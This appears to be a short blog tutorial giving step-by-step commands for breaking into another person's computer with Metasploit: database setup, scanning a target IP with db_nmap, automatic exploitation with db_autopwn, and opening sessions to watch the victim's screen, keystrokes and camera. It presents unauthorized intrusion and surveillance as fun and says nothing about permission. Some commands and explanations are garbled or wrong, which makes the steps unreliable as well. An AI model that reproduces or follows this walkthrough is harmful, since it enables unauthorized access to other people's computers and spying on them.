1.) First you
need to download Metasploit. The most up-to-date version is FREE at
metasploit.com
2.) You need
PostgrSQL for your database.
Download here:http://www.postgresql.org/.
Make sure
you use all the defaults or Metasploit woun't work!
3.) Now lets
get down to buiness... After installing both tools, open up the Post gr SQL
admin gui (start -> all programs -> PostgreSQL 9.0 -> pg Admin III).
Then right-click on your server (in the left hand box) and click connect.
Remember to keep this window open the whole time. You will also need the pass
you chose to use in step 5...
4.) Time for some hacking! Go to start ->
all programs -> Metasploit Framework, and then open the Metasploit gui. Let
it load untill it look like this:
5.) Now, in the window type:db_connect
postgres:ThePassYouChose@localhost:5432The first time you do this you will see
lots of text flash buy. Don't worry, this is normal.
6.)Type
db_host to make sure you are connected correctly.
7.)Now type
this:db_nmap 000.000.000.000Make sure you put the ip of the computer you are
trying to hack in the place of 000.000.000.000...
8.) Now we
get to the fun part; the automatic exploitation. Just type db_auto pwn -t -p -e
-s -b , watch the auto-exploitation start, go play Halo for a while, and then
come back...
9.) After the
exploitation is done, type sessions -l to see what the scanner found. If all
went well, you should see a list of exploits.
10.) Now we
get to use the exploits to hack the computer! If you will notice, all of the
exploits are numbered, and they all have obvious names (i. e.,
reverse Screen_tcp). In order to use an exploit, type this:
sessions -i
Exploit Number__________________________________________________________
The features
of Metasploit are much like a rat. Once you get into someone's computer, you
can see
their screen, control their mouse, see what they type, see them, etc.
Source
:tricks
No comments:
Post a Comment